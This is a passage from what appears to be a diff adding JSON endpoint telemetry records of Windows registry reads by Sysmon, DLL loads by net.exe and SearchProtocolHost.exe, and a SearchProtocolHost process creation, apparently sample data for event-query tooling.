"process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": 
"HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570910119984, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "image_load", + "image_name": "davhlpr.dll", + "image_path": "C:\\Windows\\System32\\davhlpr.dll", + "pid": 6292, + "process_name": "net.exe", + "process_path": "C:\\Windows\\System32\\net.exe", + "timestamp": 131883570909650000, + "unique_pid": "{42FC7E13-CAE2-5C05-0000-0010FC1B4E01}" + }, + { + "event_type": "image_load", + "image_name": "cscapi.dll", + "image_path": "C:\\Windows\\System32\\cscapi.dll", + "pid": 6292, + "process_name": "net.exe", + "process_path": "C:\\Windows\\System32\\net.exe", + "timestamp": 131883570909650000, + "unique_pid": "{42FC7E13-CAE2-5C05-0000-0010FC1B4E01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570910280000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570910280000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates", + "registry_path": 
"HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570910280000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570910280000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570910280000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570910280000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570910280000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + 
"event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570910280000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570910280000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570910280000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570910280000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 
131883570910280000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570910280000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570910280000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570910280000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570910280000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": 
"HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570910280000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570910280000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570910280000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570910280000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", + "registry_value": "Software Publishing", + "timestamp": 131883570910280000, + 
"unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", + "registry_value": "Software Publishing", + "timestamp": 131883570910280000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", + "registry_value": "Software Publishing", + "timestamp": 131883570910280000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570910280000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570910280000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + 
"process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570910280000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570910280000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570910280000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570910280000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": 
"HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570910280000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570910280000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570910280000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570910280000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570910280000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": 
"Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570910280000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570910280000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570910280000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570910280000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 
131883570910280000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570910280000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570910280000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570910280000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570910280000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": 
"HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570910280000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570910280000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570910280000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "command_line": "\"C:\\WINDOWS\\system32\\SearchProtocolHost.exe\" Global\\UsGthrFltPipeMssGthrPipe16_ Global\\UsGthrCtrlFltPipeMssGthrPipe16 1 -2147483646 \"Software\\Microsoft\\Windows Search\" \"Mozilla/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\" \"C:\\ProgramData\\Microsoft\\Search\\Data\\Temp\\usgthrsvc\" \"DownLevelDaemon\" ", + "event_type": "process", + "logon_id": 999, + "parent_process_name": "SearchIndexer.exe", + "parent_process_path": "C:\\Windows\\System32\\SearchIndexer.exe", + "pid": 3560, + "ppid": 5824, + "process_name": "SearchProtocolHost.exe", + "process_path": "C:\\Windows\\System32\\SearchProtocolHost.exe", + "subtype": "create", + "timestamp": 131883570915600000, + "unique_pid": "{42FC7E13-CAE3-5C05-0000-00104C8E4E01}", + "unique_ppid": "{42FC7E13-B303-5C05-0000-0010823E0600}", + "user": "NT AUTHORITY\\SYSTEM", + "user_domain": "NT AUTHORITY", + "user_name": "SYSTEM" + }, + { + 
"event_type": "image_load", + "image_name": "ntdll.dll", + "image_path": "C:\\Windows\\System32\\ntdll.dll", + "pid": 3560, + "process_name": "SearchProtocolHost.exe", + "process_path": "C:\\Windows\\System32\\SearchProtocolHost.exe", + "timestamp": 131883570915590000, + "unique_pid": "{42FC7E13-CAE3-5C05-0000-00104C8E4E01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", + "registry_value": "Software Publishing", + "timestamp": 131883570915590000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", + "registry_value": "Software Publishing", + "timestamp": 131883570915590000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "image_load", + "image_name": "kernel32.dll", + "image_path": "C:\\Windows\\System32\\kernel32.dll", + "pid": 3560, + "process_name": "SearchProtocolHost.exe", + "process_path": "C:\\Windows\\System32\\SearchProtocolHost.exe", + "timestamp": 131883570915590000, + "unique_pid": "{42FC7E13-CAE3-5C05-0000-00104C8E4E01}" + }, + { + "event_type": "image_load", + "image_name": "KernelBase.dll", + "image_path": "C:\\Windows\\System32\\KernelBase.dll", + "pid": 3560, + "process_name": "SearchProtocolHost.exe", + "process_path": "C:\\Windows\\System32\\SearchProtocolHost.exe", + "timestamp": 131883570915590000, + "unique_pid": 
"{42FC7E13-CAE3-5C05-0000-00104C8E4E01}" + }, + { + "event_type": "image_load", + "image_name": "msvcrt.dll", + "image_path": "C:\\Windows\\System32\\msvcrt.dll", + "pid": 3560, + "process_name": "SearchProtocolHost.exe", + "process_path": "C:\\Windows\\System32\\SearchProtocolHost.exe", + "timestamp": 131883570915590000, + "unique_pid": "{42FC7E13-CAE3-5C05-0000-00104C8E4E01}" + }, + { + "event_type": "image_load", + "image_name": "oleaut32.dll", + "image_path": "C:\\Windows\\System32\\oleaut32.dll", + "pid": 3560, + "process_name": "SearchProtocolHost.exe", + "process_path": "C:\\Windows\\System32\\SearchProtocolHost.exe", + "timestamp": 131883570915590000, + "unique_pid": "{42FC7E13-CAE3-5C05-0000-00104C8E4E01}" + }, + { + "event_type": "image_load", + "image_name": "msvcp_win.dll", + "image_path": "C:\\Windows\\System32\\msvcp_win.dll", + "pid": 3560, + "process_name": "SearchProtocolHost.exe", + "process_path": "C:\\Windows\\System32\\SearchProtocolHost.exe", + "timestamp": 131883570915590000, + "unique_pid": "{42FC7E13-CAE3-5C05-0000-00104C8E4E01}" + }, + { + "event_type": "image_load", + "image_name": "ucrtbase.dll", + "image_path": "C:\\Windows\\System32\\ucrtbase.dll", + "pid": 3560, + "process_name": "SearchProtocolHost.exe", + "process_path": "C:\\Windows\\System32\\SearchProtocolHost.exe", + "timestamp": 131883570915590000, + "unique_pid": "{42FC7E13-CAE3-5C05-0000-00104C8E4E01}" + }, + { + "event_type": "image_load", + "image_name": "combase.dll", + "image_path": "C:\\Windows\\System32\\combase.dll", + "pid": 3560, + "process_name": "SearchProtocolHost.exe", + "process_path": "C:\\Windows\\System32\\SearchProtocolHost.exe", + "timestamp": 131883570915590000, + "unique_pid": "{42FC7E13-CAE3-5C05-0000-00104C8E4E01}" + }, + { + "event_type": "image_load", + "image_name": "rpcrt4.dll", + "image_path": "C:\\Windows\\System32\\rpcrt4.dll", + "pid": 3560, + "process_name": "SearchProtocolHost.exe", + "process_path": 
"C:\\Windows\\System32\\SearchProtocolHost.exe", + "timestamp": 131883570915590000, + "unique_pid": "{42FC7E13-CAE3-5C05-0000-00104C8E4E01}" + }, + { + "event_type": "image_load", + "image_name": "bcryptprimitives.dll", + "image_path": "C:\\Windows\\System32\\bcryptprimitives.dll", + "pid": 3560, + "process_name": "SearchProtocolHost.exe", + "process_path": "C:\\Windows\\System32\\SearchProtocolHost.exe", + "timestamp": 131883570915590000, + "unique_pid": "{42FC7E13-CAE3-5C05-0000-00104C8E4E01}" + }, + { + "event_type": "image_load", + "image_name": "advapi32.dll", + "image_path": "C:\\Windows\\System32\\advapi32.dll", + "pid": 3560, + "process_name": "SearchProtocolHost.exe", + "process_path": "C:\\Windows\\System32\\SearchProtocolHost.exe", + "timestamp": 131883570915590000, + "unique_pid": "{42FC7E13-CAE3-5C05-0000-00104C8E4E01}" + }, + { + "event_type": "image_load", + "image_name": "sechost.dll", + "image_path": "C:\\Windows\\System32\\sechost.dll", + "pid": 3560, + "process_name": "SearchProtocolHost.exe", + "process_path": "C:\\Windows\\System32\\SearchProtocolHost.exe", + "timestamp": 131883570915590000, + "unique_pid": "{42FC7E13-CAE3-5C05-0000-00104C8E4E01}" + }, + { + "event_type": "image_load", + "image_name": "windows.storage.dll", + "image_path": "C:\\Windows\\System32\\windows.storage.dll", + "pid": 3560, + "process_name": "SearchProtocolHost.exe", + "process_path": "C:\\Windows\\System32\\SearchProtocolHost.exe", + "timestamp": 131883570915590000, + "unique_pid": "{42FC7E13-CAE3-5C05-0000-00104C8E4E01}" + }, + { + "event_type": "image_load", + "image_name": "shlwapi.dll", + "image_path": "C:\\Windows\\System32\\shlwapi.dll", + "pid": 3560, + "process_name": "SearchProtocolHost.exe", + "process_path": "C:\\Windows\\System32\\SearchProtocolHost.exe", + "timestamp": 131883570915740000, + "unique_pid": "{42FC7E13-CAE3-5C05-0000-00104C8E4E01}" + }, + { + "event_type": "image_load", + "image_name": "gdi32.dll", + "image_path": 
